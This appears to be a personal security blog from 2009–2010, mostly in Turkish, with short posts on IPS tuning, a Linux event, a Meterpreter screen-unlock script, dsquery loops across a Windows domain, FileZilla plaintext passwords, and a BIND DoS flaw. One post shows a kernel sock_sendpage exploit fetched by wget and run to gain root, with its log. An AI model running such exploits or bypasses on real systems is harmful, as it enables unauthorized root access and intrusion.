~ Ali Kapucu | Network & System & Security Research Worker ~

IPS Tuning Best Practices Live Webcast

Posted on Mart 2, 2010, under Network Security.

NSS Labs, the world’s leading independent information security research and testing organization. recently put seven leading Network IPS vendors through a rigorous test that included 1,159 validated exploits. nsslabs_award_tested2

One of the findings from the test was that a “tuned” IPS blocks considerably more threats than an IPS configured with a default policy alone..

To learn more about the NSS Labs Network IPS test results and some of the industry best practices for IPS tuning, please join us on March 10th for a free and insightful live webcast.

Speakers: Rick Moy, President of NSS Labs &
Matt Watchinski, Sr. Director of Sourcefire’s Vulnerability Research Team™ (VRT)

Date: Wednesday, March 10th at 11:00 a.m. Eastern (EST)

Türkiye Saati ile 10 Mart 2010 Saat 18:00

Share and Enjoy:

Özgür Yazılım ve Linux Günleri / 2010

Posted on Şubat 26, 2010, under Haberler - News.

İstanbul Bilgi Üniversitesi Bilgisayar Bilimleri Bölümü ve Linux Kullanıcıları Derneği’nin 9 yıldır düzenlemekte oldukları etkinlikler bu yıl ‘Özgür Yazılım ve Linux Günleri’ ismi altında birleşiyor.

2-3 Nisan 2010 tarihlerinde İstanbul Bilgi Üniversitesi Dolapdere Kampüsü’nde gerçekleşecek olan etkinliğin bu yıl konuk edeceği isimler arasında Matt Zimmerman (Canonical/Ubuntu), Leslie Hawthorn (Google) ve Brian King (Mozdev) yer alıyor. Etknilik hakkında daha detaylı bilgiyi web sitesinde bulabilirsiniz. 2010 yılının bu önemli buluşmasını şimdiden takvimlerinize işaretleyin.

Etkinlik web sitesi: http://www.ozguryazilimgunleri.org.tr

Share and Enjoy:

Screen Unlock Meterpreter Script

Posted on Şubat 25, 2010, under Security, System Security.

In this video, we look at a demo of the screen unlock meterpreter script. The script needs SYSTEM privileges and patches the msv1_0.dll loaded by lsass.exe so that every password will be accepted to unlock the screen. (the patch can also be undone to get back to normal behavior). Currently Windows XP SP2 and SP3 are supported. You can download it from here. The script author’s blog has more details.

Thanks go out to PaulDotCom for uploading this to vimeo.

Meterpreter Screensaver unlock script from PaulDotCom on Vimeo.

Share and Enjoy:

Lets run any command you want on every machine in your domain.

Posted on Şubat 23, 2010, under Security, System Security, Windows Servers.

After listening to Larry’s excellent technical segment on dumping the event logs from a large list of computers, I decided to try it out on my own. If you missed the technical segment, you can find the notes here. To do my own testing I needed to start with a large list of computers. For my list, I want to have the names of every computer in the domain. So I turned to “dsquery computer ” to get a list of all computers.
C:\WINDOWS> dsquery computer "CN=CONTROLER1,OU=Domain Controllers,DC=subdomain,DC=domain,DC=com"

BLA BLA BLA… Truncated

"CN=WORKSTATION1,OU=ORGUNIT1,OU=OrgUnit2,OU=OrgUnit3,DC=Subdomain, DC=Domain,DC=com"

BLA BLA BLA… Truncated again

The length of the results changes because of the variable number of subdomains, but fortunetly for us the workstation name is always the first part of the string. It is always between the CN= and the first comma. We can strip out the workstation name with the “DELIMS” and “TOKENS” option of the FOR loop. Also, by default DSQUERY will only return the first 100 results. This can be changed using the “-LIMIT” option. Setting the LIMIT to 0 returns all result. For now lets check our output looking at only two entries.

C:\WINDOWS>for /F "delims=, tokens=1" %i in ('dsquery computer -limit 2') do echo %i


C:\WINDOWS>echo "CN=WORKSTATION1

"CN=WORKSTATION1

C:\WINDOWS>echo "CN=WORKSTATION2 "CN=WORKSTATION2

We are almost there. I need to strip the first 4 characters of the line. For this I stole a page or two from Ed Skoudis’ play book. We can strip the first four characters with the SET command using the expression variable = %variable:~4%. But, since we are in a FOR loop we have to turn on delayed variable expansion and use ! instead of %.

C:\WINDOWS>cmd.exe /v:on /c "for /F "delims=, tokens=1" %i in ('dsquery computer -limit 2') do set name=%i & set name=!name:~4! & echo !name!"
(daha fazla…)

Share and Enjoy:

Kaldığım Yerden Devam

Posted on Şubat 21, 2010, under Kişisel.

Uzun ama çok uzun bir zamandır hiç bir şey yazamadım bununla birlikte inşallah tekrar aktif olarak yazmaya başlayacağım. Kendimle ilgili güncelleme olarak şu an Amerika Birleşik Devletlerinde eğitimime devam ediyorum aynı şekilde bilgisayar hayatı devam ancak Türkiye’deki hayatıma nazaran epey bir yoğun. Kendimi geliştime adına (ingilizce yeni arkadaşlıklar) bir çok gerekli, gereksiz aktiviteye katılıyorum bu aktivitelerde başı çekiyorum çekmeyede devam edeceğim. Bundan sonra zaman zaman ingilizce de yazmaya çalışacağım. Artık sadece teknik değil hayatttan da bazı şeyler yazmak istiyorum. En son olarak bulunduğum okulda bir Türk gecesi düzenledik başlangıç olarak 250 kişiden fazla misafirimiz oldu onlarla halay çektik misket, çiftetelli, roman havası oynadık. Leziz tatlarımızı kültürümüzü tanıttık başlangıç olarak çok güzeldi inşallah bundan sonra da böyle aktiviteler devam edicek. Tekrar görüşmek üzere.

Share and Enjoy:

Linux Kernel Yamalama Zamanı ve Root Olun..

Posted on Ağustos 18, 2009, under General.

Linux kernel 2.4.X ve 2.6.X sürümlerini etkileyen sifir gun acigi yayinlandi(Linux Kernel ’sock_sendpage()’ NULL Pointer Dereference Vulnerability). Özellikle sunucularında shell hesapları veren sistem adminlerinin bu açığı gidermeleri en acilinden gerekmekte..

http://www.securityfocus.com/bid/36038/info da data detaylı bilgi bulabilirsiniz!!!

Huzeyfe Onal ın yaptığı test
Exploit kullanmadan onceki kullanici haklari. $ id uid=1001(huzeyfe) gid=1001(huzeyfe) groups=1001(huzeyfe)


Exploitin kullanimi

# wget http://www.grsecurity.net/~spender/exploitx.tgz huzeyfe@guvenlis:/tmp$ cd exploitx huzeyfe@guvenlis:/tmp/exploitx$ ls exploit.c pwnkernel.c tzameti.avi wunderbar_emporium.sh huzeyfe@guvenlikod:/tmp/wunderbar_emporium$ ./exploitx.sh [+] Personality set to: PER_SVR4 E: x11wrap.c: XOpenDisplay() failed E: module.c: Failed to load module “module-x11-publish” (argument: “”): initialization failed. [+] MAPPED ZERO PAGE! [+] Resolved selinux_enforcing to 0xc05b4b7c [+] Resolved selinux_enabled to 0xc05b4b78 [+] Resolved apparmor_enabled to 0xc04798a4 [+] Resolved apparmor_complain to 0xc05b6770 [+] Resolved apparmor_audit to 0xc05b6778 [+] Resolved apparmor_logsyscall to 0xc05b677c [+] Resolved security_ops to 0xc05b3324 [+] Resolved default_security_ops to 0xc0478640 [+] Resolved sel_read_enforce to 0xc021fa60 [+] Resolved audit_enabled to 0xc0574544 [+] got ring0! [+] detected 2.6 style 8k stacks [+] Disabled security of : LSM [+] Got root! # # id uid=0(root) gid=0(root) groups=1001(huzeyfe)

Share and Enjoy:

FileZilla Ftp şifrelerimizin turşusunu kuruyor!!!

Posted on Ağustos 14, 2009, under System Security.

Merhaba Arkadaşlar bugün Friendfeed’de Ahmet Alp Balkan’ın blogunun zararlı site olmasının muhabbeti dönerken C:\Documents and Settings\XXX\Application Data\FileZilla\sitemanager.xml veya filezilla.xml dosyalarınızı bakmanızı öneririm :S ftp şifrelerimiz ne kadar açıkta görmüş oluyoruz malesef..

Share and Enjoy:

Cisco IPS'lerine IP reputation özelliğini ekledi

Posted on Ağustos 12, 2009, under Network Security.

Merhabalar malum uzun süredir yazamıyorum Türkiye’deki son 1 haftama girmiş bulunmaktayım bu süre zarfında da fazla yazamayacam ancak, olaylara Fransız kalmamak için rss ve friendfeed üzerinden kendimi sürekli yeniliyorum. En geç 2 hafta içinde I’m Back diyeceğim

Başlık ile ilgili kısma gelincede başlıkta da görülebiliceği gibi Cisco IPS’lerine IP reputation özelliğini eklemiş. Peki Nedir bu IP Reputation?? Ip Reputation zararlı iş yapan iplerin tutulduğu büyük bir veritabanları listesi diyelim.. Hani Türk Telekom’un ip adresleri sürekli Spam listelerinde bundan dolayı ip ler Blacklistlere girip Bilgi İşlemcilerin Başını ağrıyor ya o listelerden işte Ip Reputation listelerini kontrol eden spam gatewayler gelen maillerde o ipler varsa işleme almadan direk engelliyor. Bunu Cisco Ipslerin yaptığını düşünürsek DDos yada başka tür bir saldırı yapan ipleri bu databaselerden alacak IPS doğası gereği gelen saldırıyı incelemeden direk Drop yapıcak buda büyük fayda..
Görüşmek Üzere

Share and Enjoy:

Cisco IPS’lerine IP reputation özelliğini ekledi

Posted on Ağustos 12, 2009, under Network Security.

Share and Enjoy:

BIND Dinamik Güncelleme Hizmet Dışı Bırakma Açıklığı Üzerine

Posted on Ağustos 11, 2009, under System Security.

BIND yazılımının geliştiricisi olan Internet Systems Consortium, 28 Temmuz 2009 tarihinde BIND çalıştıran alan adı sunucularını etkileyebilecek bir açıklığı bildirmiş, bu açıklık CVE-2009-0696 kodlu açıklık duyurusuyla geniş kitlelere ulaştırılmıştır. Bu yazıda, açıklığın doğası, gerçekleştirme şekli ve alınabilecek önlemlere değinilecektir.

Dinamik güncelleme mekanizması, alan adı sunucularının kaydını tuttukları alanların uzaktan güncellenmeleri için kullanılan bir mekanizmadır. Yetkili istemciler, bu mekanizma sayesinde sunucudaki alan bilgilerini güncelleyebilirler. Açıklık, bu mekanizmayı kullanmakta, özel düzenlenmiş bir dinamik güncelleme istek paketinin sunucuya yollanması sonucunda sunucu sürecinin sonlanmasına yol açmaktadır.

Bu açıklıkta kullanılan özel düzenlenmiş paketin, açıklığı gerçekleştirebilmesi için iki özelliğe ihtiyacı vardır. Birincisi, oluşturulan isteğin alan adı sunucusunun yetkili (authoritative) olduğu bir alanın güncellenmesine yönelik olması; ikincisi, güncellemedeki kayıt tipinin ANY olması gerekmektedir. İlk özellik aynı zamanda sunucunun alan adı için birincil alan sunucusu olmasını gerektirdiğinden, ikincil alan adı sunucuları görünüşe göre etkilenmemektedir.
(daha fazla…)

Share and Enjoy: